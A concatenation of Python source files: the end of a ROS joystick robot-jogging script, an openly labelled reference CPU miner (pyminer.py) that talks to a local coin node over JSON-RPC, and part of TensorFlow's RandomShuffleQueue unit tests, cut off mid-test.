#m_joyJogFlag = JOG_AXIS_TASK_Y
jog_target[1] = -1*msg.axes[0] #1
print(">>>>>>>>>>>>>> jog_target = {}".format(jog_target))
#r.jog(m_joyJogFlag, MOVE_REFERENCE_TOOL, m_joyJogVel)
r.jog_multi(jog_target, MOVE_REFERENCE_BASE, m_joyJogVel)
else:
print("33333333")
if not m_joyAnalogFlag and not m_joyButtonFlag:
rospy.loginfo("jog stop")
#r.jog(m_joyJogFlag, MOVE_REFERENCE_TOOL, 0)
r.jog_multi([0,0,0,0,0,0], MOVE_REFERENCE_BASE, 0)
m_joyJogFlag = -1
if __name__ == "__main__":
rospy.init_node('joy_xbox360_py')
rospy.on_shutdown(shutdown)
t1 = threading.Thread(target=thread_stop_watch)
t1.daemon = True
t1.start()
pub_stop = rospy.Publisher('/'+ROBOT_ID +ROBOT_MODEL+'/stop', RobotStop, queue_size=10)
sub_joy = rospy.Subscriber("joy", Joy, joy_cb)
while not rospy.is_shutdown():
pass
client_socket_close(g_sock)
print 'good bye!'
|
pyminer.py | #!/usr/bin/python
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcreditRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcreditRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
random_shuffle_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = sess.run(dequeue_t)
results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = sess.run(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], size.eval())
dequeued_t.op.run()
self.assertEqual([0], size.eval())
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, size_t.eval())
enqueue_op.run()
self.assertEqual(0, size_t.eval())
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testEmptyDequeueUpToWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = sess.run(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.cached_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(sess.run(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
def blocking_dequeue():
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, sess.run(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.cached_session() as sess:
